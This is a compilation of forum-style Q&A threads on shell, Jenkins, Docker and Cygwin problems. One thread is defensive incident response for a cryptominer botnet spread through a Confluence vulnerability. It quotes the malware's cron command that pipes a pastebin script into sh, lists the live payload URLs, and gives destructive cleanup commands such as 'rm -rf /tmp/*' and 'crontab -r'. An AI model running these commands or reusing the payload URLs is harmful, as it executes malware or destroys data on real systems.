I am running make script(Execute Shell command option) inside a jenkins job.
The make script has rm -rf <directory name> shell command.
This command fails with error saying the Directory is not empty. Since script uses rm -rf it should work even if directory is not empty.
Not sure what is wrong here.
Any help around this will be much appreciated.
If your Jenkins job is executed on a Linux machine, this could b:
a permission issue.
a race condition issue (which is why deleting files first is a good idea. Then your rm -Rf will delete all the empty folders)
On Windows, check the full error message: there could be a resource preempted by the OS (used by another process).
You can first try and empty the directory and then delete the directory.
Try running the following command:
rm mydir/* mydir/.*
rmdir mydir
Related
I'm trying to get a Jenkins job to run sfdx force:data:soql:query commands in order to migrate configuration data sets between our production org and our sandboxes after a refresh. Certain configurations do not persist on a refresh so we need a way to move that data.
Running the queries from the command line on the Jenkins server work as expected, however the job when it runs fails with the following error:
'C:\Program' is not recognized as an internal or external command, operable program or batch file.
Build step 'Execute shell' marked build as failure
The job does three things:
Authorizes to the DevHub, lists out the connected orgs, and then performs a SQOL query to just print some data - 16 lines to be exact. Here are the commands in the shell script of the job:
sfdx force:auth:jwt:grant -i ${CONNECTED_APP_CONSUMER_KEY} -u ${DEV_HUB} -f ${JENKINS_HOME}/certs/prod/server.key -r [...] -a DevHub
sfdx force:org:list
sfdx force:data:soql:query -u ${DEV_HUB} -q "SELECT Id, Name FROM [...tablename...]" -r human
I am completely stumped on why this is happening. Again, running the SOQL command directly on the server through PowerShell or Command Line works as expected. I would appreciate any help with this.
This one stumped me for a long time but we finally got it figured out.
If you are seeing this error, make sure to check your machine's environmental variables. I saw a TON of other answers pointing to this as the issue where the install of SFDX path name had spaces in it as in C:|P:rogram Files\SFDX\bin but only showed some weird command line FOR loop that made no sense what so ever.
What we did was to completely uninstall all of SFDX making sure none of it was left on the machine and reinstalled into a folder we made where there was no spaces in the path name.
Once we did that, our job worked like it was supposed to. I hope this helps others who run into this same issue.
I made the mistake of installing Docker via Snap... Once I realised that snap hadn't permissions to run in my working directory (on a different partition), I removed it. Now I can't use docker after I've installed it via apt-get.
Please help.
I've done sudo snap remove docker but when I sudo apt install docker and run via docker, I get bash: /snap/bin/docker: No such file or directory
The command you are looking for is:
sudo apt install docker.io
i.e it's docker.io not just docker
On Ubuntu, the package docker is described as a "System tray for KDE3/GNOME2 applications", which is probably not what you want!
I had the same problem. This works for me.
sudo snap remove docker
sudo reboot
the point is to restart the instance or terminal.
I hope this method can help
I did the same and just restarting the instance fixed it.
The problem is simply that your bash shell caches the locations of known executables, in order to avoid having to scan through your executables search path (that is, the directories listed in $PATH) every time you type a command. Because you have removed the executable from one directory (/snap/bin) and added it to another directory (/usr/bin), this cache is now out of date. This means that it will look in the wrong location if you try to invoke the executable simply by typing docker rather than its full path.
It is possible to fix it simply by starting a new bash shell, for example open a new terminal window and type the command in there.
Alternatively if you wish to refresh the cache in the terminal session that you are already using, type:
hash -r
It is not necessary to restart your computer (although this would also work).
So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.
it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.
A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.
I was trying to set up a bash command in Terminal on a Mac.
The scripts run correctly when I execute them directly.
I set up symlinks in /usr/local/bin/ to the current location of the scripts. When I try to run it off the symlink, it doesn't work. I don't believe the issue is the $PATH, because pip, git, ipython all exist in this location. When I edit the $PATH setting, these fail.
Suggestions?
ls -l /usr/local/bin/foo and see where your symlink is actually pointing. Betcha it's broken.
If not, try running /usr/local/bin/foo. If that works, it was your PATH that's wrong, despite what you said in the OP.
The only other thing that would cause this behavior is if the script is reading $0 (its own name as executed). With a symlink, that will have a different value.
I found my own answer... The symlinks were created by an automated file which was gabbing my pwd. I was also using virtualenv, so to get it to work, I had to activate the virtualenv and be inside the folder that had the script that created the symlinks.
I install my commands in $HOME/bin instead of /usr/local/bin, but it does not matter much. As hinted in the comments, one question is whether the symlinks are set correctly.
Check which command the shell thinks you should execute: which command
Check that the link in /usr/local/bin points to the correct file (and has execute permission, etc):
ls -l /usr/local/bin/command
ls -lL /usr/local/bin/command
Check that the interpreter path in the shebang is correct:
file /usr/local/bin/command
Check that /usr/local/bin is actually on your PATH: echo $PATH
If none of that shows up a problem, show us the results of the commands above.
While trying to install a build server I've run into a funny problem where all cygwin commands can be run from a DOS box but sometimes do not work when called from make. What's even more weird is some make targets, like 'clean', work and others, like 'all', do not.
Here's a representative makefile extract. The quoting has hosed the formatting but tabs are where they should be, trust me:
.PHONY: all
all: update_autoconstants
/usr/bin/rm -f $(OBJ_DIR)/myfile1.txt
rm -f $(OBJ_DIR)/myfile2.txt
.PHONY: clean
clean:
rm -f $(OBJ_DIR)/*.*
Notice that in 'all' one rm call has a full path and one has no path. Also notice that clean's rm call has no path.
To this the response to a 'make -C makefile all' is:
/usr/bin/rm -f ../../obj/myfile1.txt
rm -f ../../obj/myfile2.txt
make: rm: Command not found
make: *** [all] Error 127
ie. the full path works, the no-path does not. What then starts my head spinning is the 'clean' target in make with no path works fine. it's not just cygwin commands, make can't find the compiler either. It seems pretty clear that somewhere the path has been hosed, although the environment variable PATH is set, but only in make - this works fine from a DOS prompt.
C:\>cygpath --unix c:\programme\cygwin\bin\rm
/usr/bin/rm
The machine is running Windows Server 2003 German language in a virtual machine on VMWare ESX, the cygwin install was done yesterday, installed in c:\programme\cygwin\ and everything else is clean vanilla Windows installation.
Any ideas? Thanks in advance.
Not really so much of a solution as a workaround - we made all the makefiles use absolute paths to the exe files they need which is in any case a bit nicer than searching a path and taking what you find.
To perhaps save someone some Googling commands in cygwin's bin directory can best be called:
CYGWIN_EXE_PATH = /usr/bin
RM = $(CYGWIN_EXE_PATH)/rm.exe
.PHONY: clean
clean:
$(RM) -f $(OBJ_DIR)/*.*
And similarly files in the program files directory like this:
COMPILER_DIR = "$(PROGRAMFILES)/TASKING/c563 v3.6r1"
Hope that helps.
I've had the exact same thing.
rm not being found by make from within a makefile.
My workaround was to run the makefile from within bash. Previously I was just running make from a windows cmd box. This cured the problem for me, but created new issues. The permissions of some files that were created during the make had very odd permissions being set.